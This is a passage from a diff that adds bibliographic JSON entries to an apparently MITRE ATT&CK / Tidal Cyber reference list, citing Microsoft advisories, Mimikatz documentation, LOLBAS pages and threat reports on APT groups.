], + "source": "MITRE", + "title": "Microsoft Register-WmiEvent" + }, + "related": [], + "uuid": "6d75029f-f63c-4ca6-b5f9-cb41b698b32a", + "value": "Microsoft Register-WmiEvent" + }, + { + "description": "MSRC Team. (2023, June 16). Microsoft Response to Layer 7 Distributed Denial of Service (DDoS) Attacks. Retrieved October 10, 2023.", + "meta": { + "date_accessed": "2023-10-10T00:00:00Z", + "date_published": "2023-06-16T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://msrc.microsoft.com/blog/2023/06/microsoft-response-to-layer-7-distributed-denial-of-service-ddos-attacks/" + ], + "source": "Tidal Cyber", + "title": "Microsoft Response to Layer 7 Distributed Denial of Service (DDoS) Attacks" + }, + "related": [], + "uuid": "d64e941e-785b-4b23-a7d0-04f12024b033", + "value": "Microsoft DDoS Attacks Response June 2023" + }, + { + "description": "Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved March 13, 2020.", + "meta": { + "date_accessed": "2020-03-13T00:00:00Z", + "date_published": "1978-05-23T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/security-updates/securityadvisories/2010/2269637" + ], + "source": "MITRE", + "title": "Microsoft Security Advisory 2269637" + }, + "related": [], + "uuid": "fa3d303e-bb1a-426d-9387-e92fc1ea75bc", + "value": "Microsoft Security Advisory 2269637" + }, + { + "description": "Microsoft. (2010, August 22). Microsoft Security Advisory 2269637 Released. Retrieved December 5, 2014.", + "meta": { + "date_accessed": "2014-12-05T00:00:00Z", + "date_published": "2010-08-22T00:00:00Z", + "refs": [ + "https://msrc-blog.microsoft.com/2010/08/21/microsoft-security-advisory-2269637-released/" + ], + "source": "MITRE", + "title": "Microsoft Security Advisory 2269637 Released" + }, + "related": [], + "uuid": "ebb94db8-b1a3-4d61-97e6-9b787a742669", + "value": "Microsoft 2269637" + }, + { + "description": "Microsoft. (2017, November 8). Microsoft Security Advisory 4053440 - Securely opening Microsoft Office documents that contain Dynamic Data Exchange (DDE) fields. Retrieved November 21, 2017.", + "meta": { + "date_accessed": "2017-11-21T00:00:00Z", + "date_published": "2017-11-08T00:00:00Z", + "refs": [ + "https://technet.microsoft.com/library/security/4053440" + ], + "source": "MITRE", + "title": "Microsoft Security Advisory 4053440 - Securely opening Microsoft Office documents that contain Dynamic Data Exchange (DDE) fields" + }, + "related": [], + "uuid": "955b0074-a1d6-40b5-9437-bd2548daf54c", + "value": "Microsoft DDE Advisory Nov 2017" + }, + { + "description": "Microsoft. (2014, May 13). Microsoft Security Advisory: Update to improve credentials protection and management. Retrieved June 8, 2020.", + "meta": { + "date_accessed": "2020-06-08T00:00:00Z", + "date_published": "2014-05-13T00:00:00Z", + "refs": [ + "https://support.microsoft.com/en-us/help/2871997/microsoft-security-advisory-update-to-improve-credentials-protection-a" + ], + "source": "MITRE", + "title": "Microsoft Security Advisory: Update to improve credentials protection and management" + }, + "related": [], + "uuid": "2a9149d7-ba39-47f2-8f23-7f3b175931f0", + "value": "Microsoft WDigest Mit" + }, + { + "description": "Microsoft. (2017, March 14). Microsoft Security Bulletin MS17-010 - Critical. Retrieved August 17, 2017.", + "meta": { + "date_accessed": "2017-08-17T00:00:00Z", + "date_published": "2017-03-14T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010" + ], + "source": "MITRE", + "title": "Microsoft Security Bulletin MS17-010 - Critical" + }, + "related": [], + "uuid": "8088a624-d8c8-4d8e-99c2-a9da4a2f0117", + "value": "MS17-010 March 2017" + }, + { + "description": "Ben Koehl, Joe Hannon. (2020, September 24). Microsoft Security - Detecting Empires in the Cloud. Retrieved August 24, 2021.", + "meta": { + "date_accessed": "2021-08-24T00:00:00Z", + "date_published": "2020-09-24T00:00:00Z", + "refs": [ + "https://www.microsoft.com/security/blog/2020/09/24/gadolinium-detecting-empires-cloud/" + ], + "source": "MITRE", + "title": "Microsoft Security - Detecting Empires in the Cloud" + }, + "related": [], + "uuid": "ee352214-421f-4778-ac28-949142a8ef2a", + "value": "MSTIC GADOLINIUM September 2020" + }, + { + "description": "Anthe, C. et al. (2015, October 19). Microsoft Security Intelligence Report Volume 19. Retrieved December 23, 2015.", + "meta": { + "date_accessed": "2015-12-23T00:00:00Z", + "date_published": "2015-10-19T00:00:00Z", + "refs": [ + "http://download.microsoft.com/download/4/4/C/44CDEF0E-7924-4787-A56A-16261691ACE3/Microsoft_Security_Intelligence_Report_Volume_19_English.pdf" + ], + "source": "MITRE", + "title": "Microsoft Security Intelligence Report Volume 19" + }, + "related": [], + "uuid": "050e0a70-19e6-4637-a3f7-b7cd788cca43", + "value": "Microsoft SIR Vol 19" + }, + { + "description": "Anthe, C. et al. (2016, December 14). Microsoft Security Intelligence Report Volume 21. Retrieved November 27, 2017.", + "meta": { + "date_accessed": "2017-11-27T00:00:00Z", + "date_published": "2016-12-14T00:00:00Z", + "refs": [ + "http://download.microsoft.com/download/E/B/0/EB0F50CC-989C-4B66-B7F6-68CD3DC90DE3/Microsoft_Security_Intelligence_Report_Volume_21_English.pdf" + ], + "source": "MITRE", + "title": "Microsoft Security Intelligence Report Volume 21" + }, + "related": [], + "uuid": "619b9cf8-7201-45de-9c36-834ccee356a9", + "value": "Microsoft SIR Vol 21" + }, + { + "description": "MsftSecIntel. (2023, May 26). Microsoft Threat Intelligence Tweet April 26 2023. Retrieved June 16, 2023.", + "meta": { + "date_accessed": "2023-06-16T00:00:00Z", + "date_published": "2023-05-26T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://twitter.com/MsftSecIntel/status/1651346653901725696" + ], + "source": "Tidal Cyber", + "title": "Microsoft Threat Intelligence Tweet April 26 2023" + }, + "related": [], + "uuid": "3b5a2349-e10c-422b-91e3-20e9033fdb60", + "value": "Microsoft Threat Intelligence Tweet April 26 2023" + }, + { + "description": "MsftSecIntel. (2023, August 17). Microsoft Threat Intelligence Tweet August 17 2023. Retrieved September 14, 2023.", + "meta": { + "date_accessed": "2023-09-14T00:00:00Z", + "date_published": "2023-08-17T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://twitter.com/MsftSecIntel/status/1692212191536066800" + ], + "source": "Tidal Cyber", + "title": "Microsoft Threat Intelligence Tweet August 17 2023" + }, + "related": [], + "uuid": "8b0ebcb5-d531-4f49-aa2d-bceb5e491b3f", + "value": "Microsoft Threat Intelligence Tweet August 17 2023" + }, + { + "description": "Wikipedia. (2017, January 31). Microsoft Windows library files. Retrieved February 13, 2017.", + "meta": { + "date_accessed": "2017-02-13T00:00:00Z", + "date_published": "2017-01-31T00:00:00Z", + "refs": [ + "https://en.wikipedia.org/wiki/Microsoft_Windows_library_files" + ], + "source": "MITRE", + "title": "Microsoft Windows library files" + }, + "related": [], + "uuid": "9b6e2f38-6e5a-4e4f-ad84-97155be2c641", + "value": "Wikipedia Windows Library Files" + }, + { + "description": "Mesa, M, et al. (2017, June 1). Microsoft Word Intruder Integrates CVE-2017-0199, Utilized by Cobalt Group to Target Financial Institutions. Retrieved October 10, 2018.", + "meta": { + "date_accessed": "2018-10-10T00:00:00Z", + "date_published": "2017-06-01T00:00:00Z", + "refs": [ + "https://www.proofpoint.com/us/threat-insight/post/microsoft-word-intruder-integrates-cve-2017-0199-utilized-cobalt-group-target" + ], + "source": "MITRE", + "title": "Microsoft Word Intruder Integrates CVE-2017-0199, Utilized by Cobalt Group to Target Financial Institutions" + }, + "related": [], + "uuid": "c4922659-88b2-4311-9c9b-dc9b383d746a", + "value": "Proofpoint Cobalt June 2017" + }, + { + "description": "LOLBAS. (2018, October 22). Microsoft.Workflow.Compiler.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-10-22T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Microsoft.Workflow.Compiler/" + ], + "source": "Tidal Cyber", + "title": "Microsoft.Workflow.Compiler.exe" + }, + "related": [], + "uuid": "1e659b32-a06f-45dc-a1eb-03f1a42c55ef", + "value": "Microsoft.Workflow.Compiler.exe - LOLBAS Project" + }, + { + "description": "Muncaster, P.. (2014, October 14). Microsoft Zero Day Traced to Russian ‘Sandworm’ Hackers. Retrieved October 6, 2017.", + "meta": { + "date_accessed": "2017-10-06T00:00:00Z", + "date_published": "2014-10-14T00:00:00Z", + "refs": [ + "https://www.infosecurity-magazine.com/news/microsoft-zero-day-traced-russian/" + ], + "source": "MITRE", + "title": "Microsoft Zero Day Traced to Russian ‘Sandworm’ Hackers" + }, + "related": [], + "uuid": "05b3840d-162d-455f-a87b-229e83e5a031", + "value": "InfoSecurity Sandworm Oct 2014" + }, + { + "description": "Wardle, Patrick. (2018, December 20). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 1). Retrieved October 3, 2019.", + "meta": { + "date_accessed": "2019-10-03T00:00:00Z", + "date_published": "2018-12-20T00:00:00Z", + "refs": [ + "https://objective-see.com/blog/blog_0x3B.html" + ], + "source": "MITRE, Tidal Cyber", + "title": "Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 1)" + }, + "related": [], + "uuid": "7a32c962-8050-45de-8b90-8644be5109d9", + "value": "objective-see windtail1 dec 2018" + }, + { + "description": "Wardle, Patrick. (2019, January 15). Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 2). Retrieved October 3, 2019.", + "meta": { + "date_accessed": "2019-10-03T00:00:00Z", + "date_published": "2019-01-15T00:00:00Z", + "refs": [ + "https://objective-see.com/blog/blog_0x3D.html" + ], + "source": "MITRE", + "title": "Middle East Cyber-Espionage analyzing WindShift's implant: OSX.WindTail (part 2)" + }, + "related": [], + "uuid": "e6bdc679-ee0c-4f34-b5bc-0d6a26485b36", + "value": "objective-see windtail2 jan 2019" + }, + { + "description": "Bing, C. (2017, October 16). Middle Eastern hacking group is using FinFisher malware to conduct international espionage. Retrieved February 15, 2018.", + "meta": { + "date_accessed": "2018-02-15T00:00:00Z", + "date_published": "2017-10-16T00:00:00Z", + "refs": [ + "https://www.cyberscoop.com/middle-eastern-hacking-group-using-finfisher-malware-conduct-international-espionage/" + ], + "source": "MITRE", + "title": "Middle Eastern hacking group is using FinFisher malware to conduct international espionage" + }, + "related": [], + "uuid": "a8224ad5-4688-4382-a3e7-1dd3ed74ebce", + "value": "CyberScoop BlackOasis Oct 2017" + }, + { + "description": "Deply, B. (n.d.). Mimikatz. Retrieved September 29, 2015.", + "meta": { + "date_accessed": "2015-09-29T00:00:00Z", + "refs": [ + "https://github.com/gentilkiwi/mimikatz" + ], + "source": "MITRE", + "title": "Mimikatz" + }, + "related": [], + "uuid": "c92d890c-2839-433a-b458-f663e66e1c63", + "value": "Deply Mimikatz" + }, + { + "description": "CG. (2014, May 20). Mimikatz Against Virtual Machine Memory Part 1. Retrieved November 12, 2014.", + "meta": { + "date_accessed": "2014-11-12T00:00:00Z", + "date_published": "2014-05-20T00:00:00Z", + "refs": [ + "http://carnal0wnage.attackresearch.com/2014/05/mimikatz-against-virtual-machine-memory.html" + ], + "source": "MITRE", + "title": "Mimikatz Against Virtual Machine Memory Part 1" + }, + "related": [], + "uuid": "46836549-f7e9-45e1-8d89-4d25ba26dbd7", + "value": "CG 2014" + }, + { + "description": "Metcalf, S. (2014, November 22). Mimikatz and Active Directory Kerberos Attacks. Retrieved June 2, 2016.", + "meta": { + "date_accessed": "2016-06-02T00:00:00Z", + "date_published": "2014-11-22T00:00:00Z", + "refs": [ + "https://adsecurity.org/?p=556" + ], + "source": "MITRE", + "title": "Mimikatz and Active Directory Kerberos Attacks" + }, + "related": [], + "uuid": "07ff57eb-1e23-433b-8da7-80f1caf7543e", + "value": "ADSecurity AD Kerberos Attacks" + }, + { + "description": "Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids, Oh My. Retrieved August 7, 2017.", + "meta": { + "date_accessed": "2017-08-07T00:00:00Z", + "date_published": "2015-09-22T00:00:00Z", + "refs": [ + "http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/" + ], + "source": "MITRE", + "title": "Mimikatz and DCSync and ExtraSids, Oh My" + }, + "related": [], + "uuid": "2afa76c1-caa1-4f16-9289-7abc7eb3a102", + "value": "Harmj0y Mimikatz and DCSync" + }, + { + "description": "Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids, Oh My. Retrieved December 4, 2017.", + "meta": { + "date_accessed": "2017-12-04T00:00:00Z", + "date_published": "2015-09-22T00:00:00Z", + "refs": [ + "http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/" + ], + "source": "MITRE", + "title": "Mimikatz and DCSync and ExtraSids, Oh My" + }, + "related": [], + "uuid": "2a01a70c-28a8-444e-95a7-00a568d51ce6", + "value": "Harmj0y DCSync Sept 2015" + }, + { + "description": "Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation, and Detection. Retrieved December 4, 2017.", + "meta": { + "date_accessed": "2017-12-04T00:00:00Z", + "date_published": "2015-09-25T00:00:00Z", + "refs": [ + "https://adsecurity.org/?p=1729" + ], + "source": "MITRE", + "title": "Mimikatz DCSync Usage, Exploitation, and Detection" + }, + "related": [], + "uuid": "856ed70b-29b0-4f56-b5ae-a98981a22eaf", + "value": "AdSecurity DCSync Sept 2015" + }, + { + "description": "Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation, and Detection. Retrieved August 7, 2017.", + "meta": { + "date_accessed": "2017-08-07T00:00:00Z", + "date_published": "2015-09-25T00:00:00Z", + "refs": [ + "https://adsecurity.org/?p=1729" + ], + "source": "MITRE", + "title": "Mimikatz DCSync Usage, Exploitation, and Detection" + }, + "related": [], + "uuid": "61b0bb42-2ed6-413d-b331-0a84df12a87d", + "value": "ADSecurity Mimikatz DCSync" + }, + { + "description": "Jamieson O'Reilly (putterpanda). (2016, July 4). mimikittenz. Retrieved June 20, 2019.", + "meta": { + "date_accessed": "2019-06-20T00:00:00Z", + "date_published": "2016-07-04T00:00:00Z", + "refs": [ + "https://github.com/putterpanda/mimikittenz" + ], + "source": "MITRE", + "title": "mimikittenz" + }, + "related": [], + "uuid": "2e0a95b2-3f9a-4638-9bc5-ff1f3ac2af4b", + "value": "GitHub Mimikittenz July 2016" + }, + { + "description": "Gregal, H. (2017, May 12). MimiPenguin. Retrieved December 5, 2017.", + "meta": { + "date_accessed": "2017-12-05T00:00:00Z", + "date_published": "2017-05-12T00:00:00Z", + "refs": [ + "https://github.com/huntergregal/mimipenguin" + ], + "source": "MITRE", + "title": "MimiPenguin" + }, + "related": [], + "uuid": "b10cd6cc-35ed-4eac-b213-110de28f33ef", + "value": "MimiPenguin GitHub May 2017" + }, + { + "description": "Lozhkin, S.. (2015, July 16). Minidionis – one more APT with a usage of cloud drives. Retrieved April 5, 2017.", + "meta": { + "date_accessed": "2017-04-05T00:00:00Z", + "date_published": "2015-07-16T00:00:00Z", + "refs": [ + "https://securelist.com/minidionis-one-more-apt-with-a-usage-of-cloud-drives/71443/" + ], + "source": "MITRE", + "title": "Minidionis – one more APT with a usage of cloud drives" + }, + "related": [], + "uuid": "af40a05e-02fb-4943-b3ff-9a292679e93d", + "value": "Securelist Minidionis July 2015" + }, + { + "description": "Maljic, T. (2020, April 16). Mining for malicious Ruby gems. Retrieved October 15, 2022.", + "meta": { + "date_accessed": "2022-10-15T00:00:00Z", + "date_published": "2020-04-16T00:00:00Z", + "refs": [ + "https://blog.reversinglabs.com/blog/mining-for-malicious-ruby-gems" + ], + "source": "MITRE", + "title": "Mining for malicious Ruby gems" + }, + "related": [], + "uuid": "ca2074d8-330b-544e-806f-ddee7b702631", + "value": "mining_ruby_reversinglabs" + }, + { + "description": "RISKIQ. (2017, December 20). Mining Insights: Infrastructure Analysis of Lazarus Group Cyber Attacks on the Cryptocurrency Industry. Retrieved July 29, 2022.", + "meta": { + "date_accessed": "2022-07-29T00:00:00Z", + "date_published": "2017-12-20T00:00:00Z", + "refs": [ + "https://web.archive.org/web/20171223000420/https://www.riskiq.com/blog/labs/lazarus-group-cryptocurrency/" + ], + "source": "MITRE", + "title": "Mining Insights: Infrastructure Analysis of Lazarus Group Cyber Attacks on the Cryptocurrency Industry" + }, + "related": [], + "uuid": "83de363d-b575-4851-9c2d-a78f504cf754", + "value": "lazgroup_idn_phishing" + }, + { + "description": "Rosenberg, J. (2018, June 14). MirageFox: APT15 Resurfaces With New Tools Based On Old Ones. Retrieved September 21, 2018.", + "meta": { + "date_accessed": "2018-09-21T00:00:00Z", + "date_published": "2018-06-14T00:00:00Z", + "refs": [ + "https://web.archive.org/web/20180615122133/https://www.intezer.com/miragefox-apt15-resurfaces-with-new-tools-based-on-old-ones/" + ], + "source": "MITRE, Tidal Cyber", + "title": "MirageFox: APT15 Resurfaces With New Tools Based On Old Ones" + }, + "related": [], + "uuid": "0110500c-bf67-43a5-97cb-16eb6c01040b", + "value": "APT15 Intezer June 2018" + }, + { + "description": "Duarte, H., Morrison, B. (2012). (Mis)trusting and (ab)using ssh. Retrieved January 8, 2018.", + "meta": { + "date_accessed": "2018-01-08T00:00:00Z", + "date_published": "2012-01-01T00:00:00Z", + "refs": [ + "https://www.slideshare.net/morisson/mistrusting-and-abusing-ssh-13526219" + ], + "source": "MITRE", + "title": "(Mis)trusting and (ab)using ssh" + }, + "related": [], + "uuid": "4f63720a-50b6-4eef-826c-71ce8d6e4bb8", + "value": "Slideshare Abusing SSH" + }, + { + "description": "Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.", + "meta": { + "date_accessed": "2020-10-19T00:00:00Z", + "date_published": "2012-12-01T00:00:00Z", + "refs": [ + "https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf" + ], + "source": "MITRE", + "title": "Mitigating Spoofed Emails Using Sender Policy Framework" + }, + "related": [], + "uuid": "4e82a053-c881-4569-8efe-3ef40f6e25a0", + "value": "ACSC Email Spoofing" + }, + { + "description": "NSA Cybersecurity Directorate. (n.d.). Mitigating Web Shells. Retrieved July 22, 2021.", + "meta": { + "date_accessed": "2021-07-22T00:00:00Z", + "refs": [ + "https://github.com/nsacyber/Mitigating-Web-Shells" + ], + "source": "MITRE", + "title": "Mitigating Web Shells" + }, + "related": [], + "uuid": "cc40e8e8-5450-4340-a091-ae7e609778dc", + "value": "NSA Cyber Mitigating Web Shells" + }, + { + "description": "Massachusetts Institute of Technology. (n.d.). MIT Kerberos Documentation: Credential Cache. Retrieved October 4, 2021.", + "meta": { + "date_accessed": "2021-10-04T00:00:00Z", + "refs": [ + "https://web.mit.edu/kerberos/krb5-1.12/doc/basic/ccache_def.html" + ], + "source": "MITRE", + "title": "MIT Kerberos Documentation: Credential Cache" + }, + "related": [], + "uuid": "6a1b4373-2304-420c-8733-e1eae71ff7b2", + "value": "MIT ccache" + }, + { + "description": "The MITRE Corporation. (2014). MITRE Systems Engineering Guide. Retrieved April 6, 2018.", + "meta": { + "date_accessed": "2018-04-06T00:00:00Z", + "date_published": "2014-01-01T00:00:00Z", + "refs": [ + "https://www.mitre.org/sites/default/files/publications/se-guide-book-interactive.pdf" + ], + "source": "MITRE", + "title": "MITRE Systems Engineering Guide" + }, + "related": [], + "uuid": "576f95bc-5cb9-473e-b026-19b864d1c26c", + "value": "MITRE SE Guide 2014" + }, + { + "description": "Microsoft. (2017, October 16). mmc. Retrieved September 20, 2021.", + "meta": { + "date_accessed": "2021-09-20T00:00:00Z", + "date_published": "2017-10-16T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mmc" + ], + "source": "MITRE", + "title": "mmc" + }, + "related": [], + "uuid": "508373ef-2634-404f-99de-7a73cce68699", + "value": "win_mmc" + }, + { + "description": "LOLBAS. (2018, December 4). Mmc.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-12-04T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Mmc/" + ], + "source": "Tidal Cyber", + "title": "Mmc.exe" + }, + "related": [], + "uuid": "490b6769-e386-4a3d-972e-5a919cb2f6f5", + "value": "Mmc.exe - LOLBAS Project" + }, + { + "description": "E. Xu, G. Guo. (2019, June 28). Mobile Cyberespionage Campaign ‘Bouncing Golf’ Affects Middle East. Retrieved January 27, 2020.", + "meta": { + "date_accessed": "2020-01-27T00:00:00Z", + "date_published": "2019-06-28T00:00:00Z", + "refs": [ + "https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east/" + ], + "source": "MITRE", + "title": "Mobile Cyberespionage Campaign ‘Bouncing Golf’ Affects Middle East" + }, + "related": [], + "uuid": "b830fe30-0b53-4fc6-a172-7da930618725", + "value": "Trend Micro Bouncing Golf 2019" + }, + { + "description": "O'Neill, R. (2009, May). Modern Day ELF Runtime infection via GOT poisoning. Retrieved March 15, 2020.", + "meta": { + "date_accessed": "2020-03-15T00:00:00Z", + "date_published": "2009-05-01T00:00:00Z", + "refs": [ + "https://web.archive.org/web/20150711051625/http://vxer.org/lib/vrn00.html" + ], + "source": "MITRE", + "title": "Modern Day ELF Runtime infection via GOT poisoning" + }, + "related": [], + "uuid": "3ca314d4-3fcf-4545-8ae9-4d8781d51295", + "value": "ELF Injection May 2009" + }, + { + "description": "Elastic Security 7.17. (2022, February 1). Modification of Environment Variable via Launchctl. Retrieved September 28, 2023.", + "meta": { + "date_accessed": "2023-09-28T00:00:00Z", + "date_published": "2022-02-01T00:00:00Z", + "refs": [ + "https://www.elastic.co/guide/en/security/7.17/prebuilt-rule-7-16-4-modification-of-environment-variable-via-launchctl.html" + ], + "source": "MITRE", + "title": "Modification of Environment Variable via Launchctl" + }, + "related": [], + "uuid": "04b0582e-357f-5f2a-8582-b3bf8f52c2a2", + "value": "Elastic Rules macOS launchctl 2022" + }, + { + "description": "Russell, R. (n.d.). modinfo(8) - Linux man page. Retrieved March 28, 2023.", + "meta": { + "date_accessed": "2023-03-28T00:00:00Z", + "refs": [ + "https://linux.die.net/man/8/modinfo" + ], + "source": "MITRE", + "title": "modinfo(8) - Linux man page" + }, + "related": [], + "uuid": "d4f2db5c-ef6d-556d-a5e2-f6738277fecd", + "value": "modinfo man" + }, + { + "description": "hasherezade. (2021, June 30). Module 3 - Understanding and countering malware's evasion and self-defence. Retrieved April 1, 2022.", + "meta": { + "date_accessed": "2022-04-01T00:00:00Z", + "date_published": "2021-06-30T00:00:00Z", + "refs": [ + "https://github.com/hasherezade/malware_training_vol1/blob/main/slides/module3/Module3_2_fingerprinting.pdf" + ], + "source": "MITRE", + "title": "Module 3 - Understanding and countering malware's evasion and self-defence" + }, + "related": [], + "uuid": "53b0c71d-c577-40e8-8a04-9de083e276a2", + "value": "hasherezade debug" + }, + { + "description": "Microsoft. (n.d.). Module Class. Retrieved September 28, 2021.", + "meta": { + "date_accessed": "2021-09-28T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module" + ], + "source": "MITRE", + "title": "Module Class" + }, + "related": [], + "uuid": "b051a38a-09c7-4280-a5b6-08067d81a2d8", + "value": "Microsoft Module Class" + }, + { + "description": "Deply, B., Le Toux, V.. (2016, June 5). module ~ kerberos. Retrieved March 17, 2020.", + "meta": { + "date_accessed": "2020-03-17T00:00:00Z", + "date_published": "2016-06-05T00:00:00Z", + "refs": [ + "https://github.com/gentilkiwi/mimikatz/wiki/module-~-kerberos" + ], + "source": "MITRE", + "title": "module ~ kerberos" + }, + "related": [], + "uuid": "b5eca224-bea1-48e8-acdc-e910d52560f1", + "value": "GitHub Mimikatz kerberos Module" + }, + { + "description": "Deply, B., Le Toux, V. (2016, June 5). module ~ lsadump. Retrieved August 7, 2017.", + "meta": { + "date_accessed": "2017-08-07T00:00:00Z", + "date_published": "2016-06-05T00:00:00Z", + "refs": [ + "https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump" + ], + "source": "MITRE", + "title": "module ~ lsadump" + }, + "related": [], + "uuid": "e188ff4d-a983-4f5a-b9e1-3b0f9fd8df25", + "value": "GitHub Mimikatz lsadump Module" + }, + { + "description": "Red Teaming Experiments. (n.d.). Module Stomping for Shellcode Injection. Retrieved July 14, 2022.", + "meta": { + "date_accessed": "2022-07-14T00:00:00Z", + "refs": [ + "https://www.ired.team/offensive-security/code-injection-process-injection/modulestomping-dll-hollowing-shellcode-injection" + ], + "source": "MITRE", + "title": "Module Stomping for Shellcode Injection" + }, + "related": [], + "uuid": "0f9b58e2-2a81-4b79-aad6-b36a844cf1c6", + "value": "Module Stomping for Shellcode Injection" + }, + { + "description": "Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs. Retrieved April 6, 2018.", + "meta": { + "date_accessed": "2018-04-06T00:00:00Z", + "date_published": "2003-04-04T00:00:00Z", + "refs": [ + "http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html" + ], + "source": "MITRE", + "title": "Modules vs Programs" + }, + "related": [], + "uuid": "ceefe610-0b26-4307-806b-17313d570511", + "value": "Linux Kernel Module Programming Guide" + }, + { + "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020.", + "meta": { + "date_accessed": "2020-05-12T00:00:00Z", + "date_published": "2016-05-17T00:00:00Z", + "refs": [ + "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf" + ], + "source": "MITRE, Tidal Cyber", + "title": "Mofang: A politically motivated information stealing adversary" + }, + "related": [], + "uuid": "f1a08b1c-f7d5-4a91-b3b7-0f042b297842", + "value": "FOX-IT May 2016 Mofang" + }, + { + "description": "Falcone, R., et al. (2020, March 3). Molerats Delivers Spark Backdoor to Government and Telecommunications Organizations. Retrieved December 14, 2020.", + "meta": { + "date_accessed": "2020-12-14T00:00:00Z", + "date_published": "2020-03-03T00:00:00Z", + "refs": [ + "https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/" + ], + "source": "MITRE", + "title": "Molerats Delivers Spark Backdoor to Government and Telecommunications Organizations" + }, + "related": [], + "uuid": "328f1c87-c9dc-42d8-bb33-a17ad4d7f57e", + "value": "Unit42 Molerat Mar 2020" + }, + { + "description": "Cybereason Nocturnus Team. (2020, December 9). MOLERATS IN THE CLOUD: New Malware Arsenal Abuses Cloud Platforms in Middle East Espionage Campaign. Retrieved December 22, 2020.", + "meta": { + "date_accessed": "2020-12-22T00:00:00Z", + "date_published": "2020-12-09T00:00:00Z", + "refs": [ + "https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf" + ], + "source": "MITRE", + "title": "MOLERATS IN THE CLOUD: New Malware Arsenal Abuses Cloud Platforms in Middle East Espionage Campaign" + }, + "related": [], + "uuid": "81a10a4b-c66f-4526-882c-184436807e1d", + "value": "Cybereason Molerats Dec 2020" + }, + { + "description": "Microsoft. (2019, June 4). Monitor at scale by using Azure Monitor. Retrieved May 1, 2020.", + "meta": { + "date_accessed": "2020-05-01T00:00:00Z", + "date_published": "2019-06-04T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/azure/backup/backup-azure-monitoring-use-azuremonitor" + ], + "source": "MITRE", + "title": "Monitor at scale by using Azure Monitor" + }, + "related": [], + "uuid": "e16974cc-623e-4fa6-ac36-5f199d54bf55", + "value": "Azure - Monitor Logs" + }, + { + "description": "Netsurion. (2014, February 19). Monitoring File Permission Changes with the Windows Security Log. Retrieved August 19, 2018.", + "meta": { + "date_accessed": "2018-08-19T00:00:00Z", + "date_published": "2014-02-19T00:00:00Z", + "refs": [ + "https://www.eventtracker.com/tech-articles/monitoring-file-permission-changes-windows-security-log/" + ], + "source": "MITRE", + "title": "Monitoring File Permission Changes with the Windows Security Log" + }, + "related": [], + "uuid": "91a4278e-ea52-4cd5-8c79-c73c690372a3", + "value": "EventTracker File Permissions Feb 2014" + }, + { + "description": "Marshall, D. & Griffin, S. (2017, November 28). Monitoring Silent Process Exit. Retrieved June 27, 2018.", + "meta": { + "date_accessed": "2018-06-27T00:00:00Z", + "date_published": "2017-11-28T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/windows-hardware/drivers/debugger/registry-entries-for-silent-process-exit" + ], + "source": "MITRE", + "title": "Monitoring Silent Process Exit" + }, + "related": [], + "uuid": "86896031-f654-4185-ba45-8c931903153b", + "value": "Microsoft Silent Process Exit NOV 2017" + }, + { + "description": "Payne, J. (2015, November 23). Monitoring what matters - Windows Event Forwarding for everyone (even if you already have a SIEM.). Retrieved February 1, 2016.", + "meta": { + "date_accessed": "2016-02-01T00:00:00Z", + "date_published": "2015-11-23T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/archive/blogs/jepayne/monitoring-what-matters-windows-event-forwarding-for-everyone-even-if-you-already-have-a-siem" + ], + "source": "MITRE", + "title": "Monitoring what matters - Windows Event Forwarding for everyone (even if you already have a SIEM.)" + }, + "related": [], + "uuid": "72798df8-0e12-46f5-acb0-2fe99bd8dbff", + "value": "Windows Event Forwarding Payne" + }, + { + "description": "Google Cloud. (2022, March 31). Monitor usage patterns for service accounts and keys . Retrieved April 1, 2022.", + "meta": { + "date_accessed": "2022-04-01T00:00:00Z", + "date_published": "2022-03-31T00:00:00Z", + "refs": [ + "https://cloud.google.com/iam/docs/service-account-monitoring" + ], + "source": "MITRE", + "title": "Monitor usage patterns for service accounts and keys" + }, + "related": [], + "uuid": "d33115c5-ae47-4089-a6cb-4ef97effa722", + "value": "GCP Monitoring Service Account Usage" + 